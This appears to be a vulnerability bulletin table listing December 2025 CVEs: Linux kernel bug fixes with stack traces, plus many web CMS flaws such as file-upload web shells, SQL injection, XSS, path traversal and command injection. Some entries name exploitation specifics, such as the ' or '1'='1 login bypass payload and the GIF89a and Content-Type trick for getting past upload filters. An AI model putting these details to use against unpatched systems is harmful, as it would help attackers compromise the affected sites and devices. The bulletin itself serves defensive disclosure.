| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netlink: do not hard code device address lenth in fdb dumps syzbot reports that some netdev devices do not have a six bytes address [1] Replace ETH_ALEN by dev->addr_len. [1] (Case of a device where dev->addr_len = 4) BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline] BUG: KMSAN: kernel-infoleak in copyout+0xb8/0x100 lib/iov_iter.c:169 instrument_copy_to_user include/linux/instrumented.h:114 [inline] copyout+0xb8/0x100 lib/iov_iter.c:169 _copy_to_iter+0x6d8/0x1d00 lib/iov_iter.c:536 copy_to_iter include/linux/uio.h:206 [inline] simple_copy_to_iter+0x68/0xa0 net/core/datagram.c:513 __skb_datagram_iter+0x123/0xdc0 net/core/datagram.c:419 skb_copy_datagram_iter+0x5c/0x200 net/core/datagram.c:527 skb_copy_datagram_msg include/linux/skbuff.h:3960 [inline] netlink_recvmsg+0x4ae/0x15a0 net/netlink/af_netlink.c:1970 sock_recvmsg_nosec net/socket.c:1019 [inline] sock_recvmsg net/socket.c:1040 [inline] ____sys_recvmsg+0x283/0x7f0 net/socket.c:2722 ___sys_recvmsg+0x223/0x840 net/socket.c:2764 do_recvmmsg+0x4f9/0xfd0 net/socket.c:2858 __sys_recvmmsg net/socket.c:2937 [inline] __do_sys_recvmmsg net/socket.c:2960 [inline] __se_sys_recvmmsg net/socket.c:2953 [inline] __x64_sys_recvmmsg+0x397/0x490 net/socket.c:2953 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Uninit was stored to memory at: __nla_put lib/nlattr.c:1009 [inline] nla_put+0x1c6/0x230 lib/nlattr.c:1067 nlmsg_populate_fdb_fill+0x2b8/0x600 net/core/rtnetlink.c:4071 nlmsg_populate_fdb net/core/rtnetlink.c:4418 [inline] ndo_dflt_fdb_dump+0x616/0x840 net/core/rtnetlink.c:4456 rtnl_fdb_dump+0x14ff/0x1fc0 net/core/rtnetlink.c:4629 netlink_dump+0x9d1/0x1310 net/netlink/af_netlink.c:2268 netlink_recvmsg+0xc5c/0x15a0 net/netlink/af_netlink.c:1995 sock_recvmsg_nosec+0x7a/0x120 net/socket.c:1019 ____sys_recvmsg+0x664/0x7f0 net/socket.c:2720 ___sys_recvmsg+0x223/0x840 net/socket.c:2764 do_recvmmsg+0x4f9/0xfd0 net/socket.c:2858 __sys_recvmmsg net/socket.c:2937 [inline] __do_sys_recvmmsg net/socket.c:2960 [inline] __se_sys_recvmmsg net/socket.c:2953 [inline] __x64_sys_recvmmsg+0x397/0x490 net/socket.c:2953 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Uninit was created at: slab_post_alloc_hook+0x12d/0xb60 mm/slab.h:716 slab_alloc_node mm/slub.c:3451 [inline] __kmem_cache_alloc_node+0x4ff/0x8b0 mm/slub.c:3490 kmalloc_trace+0x51/0x200 mm/slab_common.c:1057 kmalloc include/linux/slab.h:559 [inline] __hw_addr_create net/core/dev_addr_lists.c:60 [inline] __hw_addr_add_ex+0x2e5/0x9e0 net/core/dev_addr_lists.c:118 __dev_mc_add net/core/dev_addr_lists.c:867 [inline] dev_mc_add+0x9a/0x130 net/core/dev_addr_lists.c:885 igmp6_group_added+0x267/0xbc0 net/ipv6/mcast.c:680 ipv6_mc_up+0x296/0x3b0 net/ipv6/mcast.c:2754 ipv6_mc_remap+0x1e/0x30 net/ipv6/mcast.c:2708 addrconf_type_change net/ipv6/addrconf.c:3731 [inline] addrconf_notify+0x4d3/0x1d90 net/ipv6/addrconf.c:3699 notifier_call_chain kernel/notifier.c:93 [inline] raw_notifier_call_chain+0xe4/0x430 kernel/notifier.c:461 call_netdevice_notifiers_info net/core/dev.c:1935 [inline] call_netdevice_notifiers_extack net/core/dev.c:1973 [inline] call_netdevice_notifiers+0x1ee/0x2d0 net/core/dev.c:1987 bond_enslave+0xccd/0x53f0 drivers/net/bonding/bond_main.c:1906 do_set_master net/core/rtnetlink.c:2626 [inline] rtnl_newlink_create net/core/rtnetlink.c:3460 [inline] __rtnl_newlink net/core/rtnetlink.c:3660 [inline] rtnl_newlink+0x378c/0x40e0 net/core/rtnetlink.c:3673 rtnetlink_rcv_msg+0x16a6/0x1840 net/core/rtnetlink.c:6395 netlink_rcv_skb+0x371/0x650 net/netlink/af_netlink.c:2546 rtnetlink_rcv+0x34/0x40 net/core/rtnetlink.c:6413 netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline] netlink_unicast+0xf28/0x1230 net/netlink/af_ ---truncated--- | 2025-12-09 | not yet calculated | CVE-2023-53863 | https://git.kernel.org/stable/c/61d1bf3c34bf5fe936c50d1a4bc460babcc85e88 https://git.kernel.org/stable/c/c3ad49ff5c030cbe719fc4cb0ae081b8255ef4b3 https://git.kernel.org/stable/c/bd1de6107f10e7d4c2aabe3397b58d63672fc511 https://git.kernel.org/stable/c/44db85c6e1a184b99a2cdf56b525ac63c4962c22 https://git.kernel.org/stable/c/619384319b137908d1008c92426c9daa95c06b90 https://git.kernel.org/stable/c/e9331c8fa4c69f09d2c71682af75586f77266e81 https://git.kernel.org/stable/c/b6f2d4618fc697886ad41e215ae20638153e42d0 https://git.kernel.org/stable/c/73862118bd9dec850aa8e775145647ddd23aedf8 https://git.kernel.org/stable/c/aa5406950726e336c5c9585b09799a734b6e77bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/mxsfb: Disable overlay plane in mxsfb_plane_overlay_atomic_disable() When disabling overlay plane in mxsfb_plane_overlay_atomic_update(), overlay plane's framebuffer pointer is NULL. So, dereferencing it would cause a kernel Oops(NULL pointer dereferencing). Fix the issue by disabling overlay plane in mxsfb_plane_overlay_atomic_disable() instead. | 2025-12-09 | not yet calculated | CVE-2023-53864 | https://git.kernel.org/stable/c/8bf2d4ca521d3acb57fc1607386e749b3cc92aaf https://git.kernel.org/stable/c/0f98de0a11d29821d9448114178ddc1b1fe32a18 https://git.kernel.org/stable/c/aa656d48e871a1b062e1bbf9474d8b831c35074c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix warning when putting transaction with qgroups enabled after abort If we have a transaction abort with qgroups enabled we get a warning triggered when doing the final put on the transaction, like this: [552.6789] ------------[ cut here ]------------ [552.6815] WARNING: CPU: 4 PID: 81745 at fs/btrfs/transaction.c:144 btrfs_put_transaction+0x123/0x130 [btrfs] [552.6817] Modules linked in: btrfs blake2b_generic xor (...) [552.6819] CPU: 4 PID: 81745 Comm: btrfs-transacti Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1 [552.6819] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014 [552.6819] RIP: 0010:btrfs_put_transaction+0x123/0x130 [btrfs] [552.6821] Code: bd a0 01 00 (...) [552.6821] RSP: 0018:ffffa168c0527e28 EFLAGS: 00010286 [552.6821] RAX: ffff936042caed00 RBX: ffff93604a3eb448 RCX: 0000000000000000 [552.6821] RDX: ffff93606421b028 RSI: ffffffff92ff0878 RDI: ffff93606421b010 [552.6821] RBP: ffff93606421b000 R08: 0000000000000000 R09: ffffa168c0d07c20 [552.6821] R10: 0000000000000000 R11: ffff93608dc52950 R12: ffffa168c0527e70 [552.6821] R13: ffff93606421b000 R14: ffff93604a3eb420 R15: ffff93606421b028 [552.6821] FS: 0000000000000000(0000) GS:ffff93675fb00000(0000) knlGS:0000000000000000 [552.6821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [552.6821] CR2: 0000558ad262b000 CR3: 000000014feda005 CR4: 0000000000370ee0 [552.6822] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [552.6822] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [552.6822] Call Trace: [552.6822] <TASK> [552.6822] ? __warn+0x80/0x130 [552.6822] ? btrfs_put_transaction+0x123/0x130 [btrfs] [552.6824] ? report_bug+0x1f4/0x200 [552.6824] ? handle_bug+0x42/0x70 [552.6824] ? exc_invalid_op+0x14/0x70 [552.6824] ? asm_exc_invalid_op+0x16/0x20 [552.6824] ? btrfs_put_transaction+0x123/0x130 [btrfs] [552.6826] btrfs_cleanup_transaction+0xe7/0x5e0 [btrfs] [552.6828] ? _raw_spin_unlock_irqrestore+0x23/0x40 [552.6828] ? try_to_wake_up+0x94/0x5e0 [552.6828] ? __pfx_process_timeout+0x10/0x10 [552.6828] transaction_kthread+0x103/0x1d0 [btrfs] [552.6830] ? __pfx_transaction_kthread+0x10/0x10 [btrfs] [552.6832] kthread+0xee/0x120 [552.6832] ? __pfx_kthread+0x10/0x10 [552.6832] ret_from_fork+0x29/0x50 [552.6832] </TASK> [552.6832] ---[ end trace 0000000000000000 ]--- This corresponds to this line of code: void btrfs_put_transaction(struct btrfs_transaction *transaction) { (...) WARN_ON(!RB_EMPTY_ROOT( &transaction->delayed_refs.dirty_extent_root)); (...) } The warning happens because btrfs_qgroup_destroy_extent_records(), called in the transaction abort path, we free all entries from the rbtree "dirty_extent_root" with rbtree_postorder_for_each_entry_safe(), but we don't actually empty the rbtree - it's still pointing to nodes that were freed. So set the rbtree's root node to NULL to avoid this warning (assign RB_ROOT). | 2025-12-09 | not yet calculated | CVE-2023-53865 | https://git.kernel.org/stable/c/ae91ab710d8e309f6c9eba07ce0d9d0b5d9040f0 https://git.kernel.org/stable/c/d2c667cc18314c9bad3ec86ae071c0342132aa09 https://git.kernel.org/stable/c/c9060caab4135dd660c4676d1ea33a6e0d3fc09d https://git.kernel.org/stable/c/89e994688e965813ec0a09fb30b87fb8cee06474 https://git.kernel.org/stable/c/62dd82bc7a90b5052c062a0ad5be6d8a479a3cfb https://git.kernel.org/stable/c/aa84ce8a78a1a5c10cdf9c7a5fb0c999fbc2c8d6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: soc-compress: Reposition and add pcm_mutex If panic_on_warn is set and compress stream(DPCM) is started, then kernel panic occurred because card->pcm_mutex isn't held appropriately. In the following functions, warning were issued at this line "snd_soc_dpcm_mutex_assert_held". static int dpcm_be_connect(struct snd_soc_pcm_runtime *fe, struct snd_soc_pcm_runtime *be, int stream) { ... snd_soc_dpcm_mutex_assert_held(fe); ... } void dpcm_be_disconnect(struct snd_soc_pcm_runtime *fe, int stream) { ... snd_soc_dpcm_mutex_assert_held(fe); ... } void snd_soc_runtime_action(struct snd_soc_pcm_runtime *rtd, int stream, int action) { ... snd_soc_dpcm_mutex_assert_held(rtd); ... } int dpcm_dapm_stream_event(struct snd_soc_pcm_runtime *fe, int dir, int event) { ... snd_soc_dpcm_mutex_assert_held(fe); ... } These functions are called by soc_compr_set_params_fe, soc_compr_open_fe and soc_compr_free_fe without pcm_mutex locking. And this is call stack. [ 414.527841][ T2179] pc : dpcm_process_paths+0x5a4/0x750 [ 414.527848][ T2179] lr : dpcm_process_paths+0x37c/0x750 [ 414.527945][ T2179] Call trace: [ 414.527949][ T2179] dpcm_process_paths+0x5a4/0x750 [ 414.527955][ T2179] soc_compr_open_fe+0xb0/0x2cc [ 414.527972][ T2179] snd_compr_open+0x180/0x248 [ 414.527981][ T2179] snd_open+0x15c/0x194 [ 414.528003][ T2179] chrdev_open+0x1b0/0x220 [ 414.528023][ T2179] do_dentry_open+0x30c/0x594 [ 414.528045][ T2179] vfs_open+0x34/0x44 [ 414.528053][ T2179] path_openat+0x914/0xb08 [ 414.528062][ T2179] do_filp_open+0xc0/0x170 [ 414.528068][ T2179] do_sys_openat2+0x94/0x18c [ 414.528076][ T2179] __arm64_sys_openat+0x78/0xa4 [ 414.528084][ T2179] invoke_syscall+0x48/0x10c [ 414.528094][ T2179] el0_svc_common+0xbc/0x104 [ 414.528099][ T2179] do_el0_svc+0x34/0xd8 [ 414.528103][ T2179] el0_svc+0x34/0xc4 [ 414.528125][ T2179] el0t_64_sync_handler+0x8c/0xfc [ 414.528133][ T2179] el0t_64_sync+0x1a0/0x1a4 [ 414.528142][ T2179] Kernel panic - not syncing: panic_on_warn set ... So, I reposition and add pcm_mutex to resolve lockdep error. | 2025-12-09 | not yet calculated | CVE-2023-53866 | https://git.kernel.org/stable/c/9576b7ccc20365d27c26c494651c89360a85bbdc https://git.kernel.org/stable/c/9a9942cbdb7c3f41452f7bc4a9ff9f0b45eb3651 https://git.kernel.org/stable/c/37a3eb6054d17676ce2a0bb5dd1fbf7733ecfa7d https://git.kernel.org/stable/c/aa9ff6a4955fdba02b54fbc4386db876603703b7 |
| TianoCore--EDK2 | EDK2 contains a vulnerability in BIOS where an attacker may cause "Exposure of Sensitive Information to an Unauthorized Actor" by local access. Successful exploitation of this vulnerability will lead to possible information disclosure or escalation of privilege and impact Confidentiality. | 2025-12-09 | not yet calculated | CVE-2024-38798 | https://github.com/tianocore/edk2/security/advisories/GHSA-q2c6-37h5-7cwf |
| apprain--appRain CMF | appRain CMF 4.0.5 contains an authenticated remote code execution vulnerability that allows administrative users to upload malicious PHP files through the filemanager upload endpoint. Attackers can leverage authenticated access to generate a web shell with command execution capabilities by uploading a crafted PHP file to the site's uploads directory. | 2025-12-10 | not yet calculated | CVE-2024-58279 | ExploitDB-52041 Official Vendor Homepage Software Link VulnCheck Advisory: appRain CMF 4.0.5 Authenticated Remote Code Execution via Filemanager Upload |
| CMSimple--CMSimple | CMSimple 5.15 contains a remote command execution vulnerability that allows authenticated attackers to modify file extensions and upload malicious PHP files. Attackers can append ',php' to Extensions_userfiles and upload a shell script to the media directory to execute arbitrary code on the server. | 2025-12-10 | not yet calculated | CVE-2024-58280 | ExploitDB-52040 CMSimple Homepage CMSimple Download Page VulnCheck Advisory: CMSimple 5.15 Remote Command Execution via Extensions Configuration |
| dotclear--Dotclear | Dotclear 2.29 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files through the media upload functionality. Attackers can exploit the file upload process by crafting a PHP shell with a command execution form to gain system access through the uploaded file. | 2025-12-10 | not yet calculated | CVE-2024-58281 | ExploitDB-52037 Vendor Homepage Software Link VulnCheck Advisory: Dotclear 2.29 Remote Code Execution via Authenticated File Upload |
| Serendipity--Serendipity | Serendipity 2.5.0 contains a remote code execution vulnerability that allows authenticated administrators to upload malicious PHP files through the media upload functionality. Attackers can exploit the file upload mechanism by creating a PHP shell with a command execution form that enables arbitrary system command execution on the web server. | 2025-12-10 | not yet calculated | CVE-2024-58282 | ExploitDB-52036 Vendor Homepage Software Link VulnCheck Advisory: Serendipity 2.5.0 Remote Code Execution via Authenticated Media Upload |
| wbce--WBCE CMS | WBCE CMS version 1.6.2 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files through the Elfinder file manager. Attackers can exploit the file upload functionality in the elfinder connector to upload a web shell and execute arbitrary system commands through a user-controlled parameter. | 2025-12-10 | not yet calculated | CVE-2024-58283 | ExploitDB-52039 WBCE CMS Homepage WBCE CMS GitHub Repository VulnCheck Advisory: WBCE CMS 1.6.2 Remote Code Execution via Elfinder File Upload |
| PopojiCMS--PopojiCMS | PopojiCMS 2.0.1 contains an authenticated remote command execution vulnerability that allows administrative users to inject malicious PHP code through the metadata settings endpoint. Attackers can log in and modify the meta content to create a web shell that executes arbitrary system commands through a GET parameter. | 2025-12-10 | not yet calculated | CVE-2024-58284 | ExploitDB-52022 Official Vendor Homepage Product Archive Project Repository VulnCheck Advisory: PopojiCMS 2.0.1 Remote Command Execution via Authenticated Metadata Settings |
| chyrp--Chyrp | Chyrp 2.5.2 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into post titles. Attackers can craft payloads in the title field that will execute when the post is viewed by other users, potentially stealing session cookies or performing client-side attacks. | 2025-12-10 | not yet calculated | CVE-2024-58285 | ExploitDB-52013 Chyrp GitHub Repository Chyrp Software Archive VulnCheck Advisory: Chyrp 2.5.2 Stored Cross-Site Scripting Vulnerability via Post Title |
| vexorian--dizqueTV | dizqueTV 1.5.3 contains a remote code execution vulnerability that allows attackers to inject arbitrary commands through the FFMPEG Executable Path settings. Attackers can modify the executable path with shell commands to read system files like /etc/passwd by exploiting improper input validation. | 2025-12-11 | not yet calculated | CVE-2024-58286 | ExploitDB-52079 DizqueTV GitHub Repository VulnCheck Advisory: dizqueTV 1.5.3 Remote Code Execution via FFMPEG Executable Path |
| rengine--reNgine | reNgine 2.2.0 contains a command injection vulnerability in the nmap_cmd parameter of scan engine configuration that allows authenticated attackers to execute arbitrary commands. Attackers can modify the nmap_cmd parameter with malicious base64-encoded payloads to achieve remote code execution during scan engine configuration. | 2025-12-11 | not yet calculated | CVE-2024-58287 | ExploitDB-52081 Rengine Wiki Homepage Rengine GitHub Repository VulnCheck Advisory: reNgine 2.2.0 Authenticated Command Injection via Scan Engine Configuration |
| Genexus--Genexus Protection Server | Genexus Protection Server 9.7.2.10 contains an unquoted service path vulnerability in the protsrvservice Windows service configuration. Attackers can exploit the unquoted binary path to execute arbitrary code with elevated LocalSystem privileges by placing malicious executables in specific file system locations. | 2025-12-11 | not yet calculated | CVE-2024-58288 | ExploitDB-52065 Official Genexus Homepage Genexus Software Download Center VulnCheck Advisory: Genexus Protection Server 9.7.2.10 Unquoted Service Path Privilege Escalation |
| microweber--Microweber | Microweber 2.0.15 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts into user profile fields. Attackers can input script payloads in the first name field that will execute when the profile is viewed by other users, potentially stealing session cookies and executing arbitrary JavaScript. | 2025-12-11 | not yet calculated | CVE-2024-58289 | ExploitDB-52058 Microweber Homepage Microweber GitHub Repository VulnCheck Advisory: Microweber 2.0.15 Stored Cross-Site Scripting via User Profile Fields |
| Elements--Xhibiter NFT Marketplace | Xhibiter NFT Marketplace 1.10.2 contains a SQL injection vulnerability in the collections endpoint that allows attackers to manipulate database queries through the 'id' parameter. Attackers can exploit boolean-based, time-based, and UNION-based SQL injection techniques to potentially extract or manipulate database information by sending crafted payloads to the collections page. | 2025-12-11 | not yet calculated | CVE-2024-58290 | ExploitDB-52060 Official Vendor Homepage VulnCheck Advisory: Xhibiter NFT Marketplace 1.10.2 SQL Injection via Collections Endpoint |
| Flatboard--Flatboard | Flatboard 3.2 contains a stored cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts in forum information fields. Attackers can insert JavaScript payloads that execute when other users view the forum, potentially stealing session cookies and executing client-side scripts. | 2025-12-11 | not yet calculated | CVE-2024-58291 | ExploitDB-52054 Flatboard Homepage Flatboard Support Page VulnCheck Advisory: Flatboard 3.2 Authenticated Stored Cross-Site Scripting via Forum Information Field |
| xmbforum2--XMB Forum | XMB Forum 1.9.12.06 contains a persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious JavaScript into templates and front page settings. Attackers can insert XSS payloads in footer templates and news ticker fields, enabling script execution for all forum users when pages are rendered. | 2025-12-11 | not yet calculated | CVE-2024-58292 | ExploitDB-52044 XMB Forum Homepage VulnCheck Advisory: XMB Forum 1.9.12.06 Persistent Cross-Site Scripting via Admin Templates |
| Akaunting--Akaunting | Akaunting 3.1.8 contains a server-side template injection vulnerability that allows authenticated administrators to execute template expressions in multiple form input fields. Attackers can inject template payloads in items, taxes, transactions, and vendor name fields to perform arithmetic operations and string manipulations. | 2025-12-11 | not yet calculated | CVE-2024-58293 | ExploitDB-52030 Vendor Homepage Software Link VulnCheck Advisory: Akaunting 3.1.8 Server-Side Template Injection via Multiple Form Fields |
| FreePBX--FreePBX | FreePBX 16 contains an authenticated remote code execution vulnerability in the API module that allows attackers with valid session credentials to execute arbitrary commands. Attackers can exploit the 'generatedocs' endpoint by crafting malicious POST requests with bash command injection to establish remote shell access. | 2025-12-11 | not yet calculated | CVE-2024-58294 | ExploitDB-52031 Official Product Homepage Original Video Link VulnCheck Advisory: FreePBX 16 Authenticated Remote Code Execution via API Module |
| elkarte--ElkArte Forum | ElkArte Forum 1.1.9 contains a remote code execution vulnerability that allows authenticated administrators to upload malicious PHP files through the theme installation process. Attackers can upload a ZIP archive with a PHP file containing system commands, which can then be executed by accessing the uploaded file in the theme directory. | 2025-12-11 | not yet calculated | CVE-2024-58295 | ExploitDB-52026 ElkArte Homepage ElkArte Software Download VulnCheck Advisory: ElkArte Forum 1.1.9 Authenticated Remote Code Execution via Theme Upload |
| PhoenixCart--CE Phoenix | CE Phoenix v3.0.1 contains a stored cross-site scripting vulnerability in the currencies administration panel that allows attackers to inject malicious scripts. Attackers can insert XSS payloads in the title field to execute arbitrary JavaScript when administrators view the currencies page. | 2025-12-11 | not yet calculated | CVE-2024-58296 | ExploitDB-52015 PhoenixCart Homepage CE Phoenix Admin Panel Demo SoftAculous CE Phoenix App Page https://www.vulncheck.com/advisories/ce-phoenix-v-stored-cross-site-scripting-via-currencies-administration |
| Pyrocms--PyroCMS | PyroCMS v3.0.1 contains a stored cross-site scripting vulnerability in the admin redirects configuration that allows attackers to inject malicious scripts. Attackers can insert a payload in the 'Redirect From' field to execute arbitrary JavaScript when administrators view the redirects page. | 2025-12-11 | not yet calculated | CVE-2024-58297 | ExploitDB-52016 PyroCMS Homepage SoftAculous CMS Page VulnCheck Advisory: PyroCMS v3.0.1 Stored Cross-Site Scripting via Admin Redirects |
| BMC Software--Compuware iStrobe Web | Compuware iStrobe Web 20.13 contains a pre-authentication remote code execution vulnerability that allows unauthenticated attackers to upload malicious JSP files through a path traversal in the file upload form. Attackers can exploit the 'fileName' parameter to upload a web shell and execute arbitrary commands by sending POST requests to the uploaded JSP endpoint. | 2025-12-11 | not yet calculated | CVE-2024-58298 | ExploitDB-51991 BMC Compuware iStrobe Web Homepage BMC Compuware iStrobe Web Support Page https://www.vulncheck.com/advisories/compuware-istrobe-web-pre-auth-remote-code-execution-via-file-upload |
| Siklu--MultiHaul TG series | Siklu MultiHaul TG series devices before version 2.0.0 contain an unauthenticated vulnerability that allows remote attackers to retrieve randomly generated credentials via a network request. Attackers can send a specific hex-encoded command to port 12777 to obtain username and password, enabling direct SSH access to the device. | 2025-12-11 | not yet calculated | CVE-2024-58300 | ExploitDB-51932 Siklu Homepage VulnCheck Advisory: Siklu MultiHaul TG Series < 2.0.0 Unauthenticated Credential Disclosure |
| purei--Purei CMS | Purei CMS 1.0 contains a time-based blind SQL injection vulnerability that allows attackers to manipulate database queries through unfiltered user input parameters. Attackers can exploit vulnerable endpoints like getAllParks.php and events-ajax.php by injecting crafted SQL payloads to potentially extract or modify database information. | 2025-12-11 | not yet calculated | CVE-2024-58301 | ExploitDB-51929 Purei Homepage VulnCheck Advisory: Purei CMS 1.0 SQL Injection via Multiple Vulnerable Endpoints |
| Flarum--FriendsofFlarum Pretty Mail | FoF Pretty Mail 1.1.2 contains a local file inclusion vulnerability that allows administrative users to include arbitrary server files in email templates. Attackers can exploit the template settings by inserting file inclusion payloads to read sensitive system files like /etc/passwd during email generation. | 2025-12-11 | not yet calculated | CVE-2024-58302 | ExploitDB-51947 Flarum Homepage Pretty Mail GitHub Repository VulnCheck Advisory: FoF Pretty Mail 1.1.2 Local File Inclusion via Email Template Settings |
| Flarum--FriendsofFlarum Pretty Mail | FoF Pretty Mail 1.1.2 contains a server-side template injection vulnerability that allows administrative users to inject malicious code into email templates. Attackers can execute system commands by inserting crafted template expressions that trigger arbitrary code execution during email generation. | 2025-12-11 | not yet calculated | CVE-2024-58303 | ExploitDB-51948 Flarum Homepage Pretty Mail GitHub Repository VulnCheck Advisory: FoF Pretty Mail 1.1.2 Server Side Template Injection via Email Template Settings |
| minalic--minaliC | minaliC 2.0.0 contains a denial of service vulnerability that allows remote attackers to crash the web server by sending oversized GET requests. Attackers can send crafted HTTP requests with excessive data to overwhelm the server and cause service interruption. | 2025-12-11 | not yet calculated | CVE-2024-58306 | ExploitDB-51917 Reference VulnCheck Advisory: minaliC 2.0.0 Denial of Service Vulnerability via Large GET Request |
| cszcms--CSZCMS | CSZCMS 1.3.0 contains an authenticated SQL injection vulnerability in the members view functionality that allows authenticated attackers to manipulate database queries. Attackers can inject malicious SQL code through the view parameter to potentially execute time-based blind SQL injection attacks and extract database information. | 2025-12-11 | not yet calculated | CVE-2024-58307 | ExploitDB-51916 CSZCMS Homepage CSZCMS Download Page VulnCheck Advisory: CSZCMS 1.3.0 Authenticated SQL Injection via Members View Endpoint |
| opensolution--Quick.CMS | Quick.CMS 6.7 contains a SQL injection vulnerability that allows unauthenticated attackers to bypass login authentication by manipulating the login form. Attackers can inject specific SQL payloads like ' or '1'='1 to gain unauthorized administrative access to the system. | 2025-12-11 | not yet calculated | CVE-2024-58308 | ExploitDB-51910 Official Product Homepage Software Link VulnCheck Advisory: Quick.CMS 6.7 SQL Injection Authentication Bypass via Admin Login |
| xbtitfm--xbtitFM | xbtitFM 4.1.18 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries by injecting malicious SQL code through the msgid parameter. Attackers can send crafted requests to /shoutedit.php with EXTRACTVALUE functions to extract database names, user credentials, and password hashes from the underlying database. | 2025-12-11 | not yet calculated | CVE-2024-58309 | ExploitDB-51909 Official Vendor Homepage VulnCheck Advisory: xbtitFM 4.1.18 Unauthenticated SQL Injection in shoutedit.php |
| Apc--Network Management Card 4 | APC Network Management Card 4 contains a path traversal vulnerability that allows unauthenticated attackers to access sensitive system files by manipulating URL parameters. Attackers can exploit directory traversal techniques to read critical system files like /etc/passwd by using encoded path traversal characters in HTTP requests. | 2025-12-11 | not yet calculated | CVE-2024-58310 | ExploitDB-51897 Official Product Homepage VulnCheck Advisory: APC Network Management Card 4 Path Traversal |
| xbtitfm--xbtitFM | xbtitFM 4.1.18 contains a path traversal vulnerability that allows unauthenticated attackers to access sensitive system files by manipulating URL parameters. Attackers can exploit directory traversal techniques to read critical system files like using encoded path traversal characters in HTTP requests. | 2025-12-11 | not yet calculated | CVE-2024-58312 | ExploitDB-51909 Official Vendor Homepage VulnCheck Advisory: xbtitFM 4.1.18 Unauthenticated Path Traversal in nfogen.php |
| xbtitfm--xbtitFM | xbtitFM 4.1.18 contains an insecure file upload vulnerability that allows authenticated attackers with administrative privileges to upload and execute arbitrary PHP code through the file_hosting feature. Attackers can bypass file type restrictions by modifying the Content-Type header to image/gif, adding GIF89a magic bytes, and using alternate PHP tags to upload web shells that execute system commands. | 2025-12-11 | not yet calculated | CVE-2024-58313 | ExploitDB-51909 Official Vendor Homepage VulnCheck Advisory: xbtitFM 4.1.18 Insecure File Upload in file_hosting Feature |
| HYPR--Server | Authentication Bypass by Spoofing vulnerability in HYPR Server allows Identity Spoofing. This issue affects Server: before 10.1. | 2025-12-11 | not yet calculated | CVE-2024-8273 | https://www.hypr.com/trust-center/security-advisories |
| Frappe--Frappe HelpDesk | SQL Injection in Frappe HelpDesk in the dashboard get_dashboard_data due to unsafe concatenation of user-controlled parameters into dynamic SQL statements. This issue affects Frappe HelpDesk: 1.14.0. | 2025-12-09 | not yet calculated | CVE-2025-10655 | https://fluidattacks.com/advisories/dyango https://github.com/frappe/helpdesk https://github.com/frappe/helpdesk/pull/2795 |
| Unknown--Construction Light | The Construction Light WordPress theme before 1.6.8 does not have authorization and CSRF when activating via an AJAX action, allowing any authenticated users, such as subscriber to activate arbitrary . | 2025-12-12 | not yet calculated | CVE-2025-10684 | https://wpscan.com/vulnerability/cfabf8b2-30a4-462f-996c-79888a439c09/ |
| HP Inc--HP System Event Utility | HP System Event Utility and Omen Gaming Hub might allow execution of certain files outside of their restricted paths. This potential vulnerability was remediated with HP System Event Utility version 3.2.12 and Omen Gaming Hub version 1101.2511.101.0. | 2025-12-09 | not yet calculated | CVE-2025-11531 | https://support.hp.com/us-en/document/ish_13537533-13537555-16/hpsbgn04079 |
| AlgoSec--Firewall Analyzer | Improper Privilege Management vulnerability in AlgoSec Firewall Analyzer on Linux, 64 bit allows Privilege Escalation, Parameter Injection. A local user with access to the command line may escalate their privileges by abusing the parameters of a command that is approved in the sudoers file. This issue affects Firewall Analyzer: A33.0, A33.10. | 2025-12-09 | not yet calculated | CVE-2025-12381 | https://techdocs.algosec.com/en/cves/Content/tech-notes/cves/cve-2025-12381.htm |
| Unknown--HelloLeads CRM Form Shortcode | The HelloLeads CRM Form Shortcode WordPress plugin through 1.0 does not have authorisation and CSRF check when resetting its settings, allowing unauthenticated users to reset them | 2025-12-14 | not yet calculated | CVE-2025-12696 | https://wpscan.com/vulnerability/e552dfc8-c6e1-4605-bc36-30dc4066eaea/ |
| Rockwell Automation--FactoryTalk DataMosaix Private Cloud | A security issue was discovered in DataMosaix Private Cloud, allowing users with low privilege to perform sensitive database operations through exposed API endpoints. | 2025-12-09 | not yet calculated | CVE-2025-12807 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1765.html |
| Unknown--WooMulti | The WooMulti WordPress plugin through 17 does not validate a file parameter when deleting files, which could allow any authenticated users, such as subscriber to delete arbitrary files on the server. | 2025-12-12 | not yet calculated | CVE-2025-12835 | https://wpscan.com/vulnerability/1650ddac-04c7-47fa-b03e-bd0338243fcc/ |
| Unknown--Bookit | The Bookit WordPress plugin before 2.5.1 has a publicly accessible REST endpoint that allows unauthenticated update of the plugins Stripe payment options. | 2025-12-12 | not yet calculated | CVE-2025-12841 | https://wpscan.com/vulnerability/60cb3d5f-1aa5-4858-ab84-07fe7c023fdd/ |
| waveterm--waveterm | Code Injection using Electron Fuses in waveterm on MacOS allows TCC Bypass. This issue affects waveterm: 0.12.2. | 2025-12-12 | not yet calculated | CVE-2025-12843 | https://fluidattacks.com/advisories/minutos https://github.com/wavetermdev/waveterm |
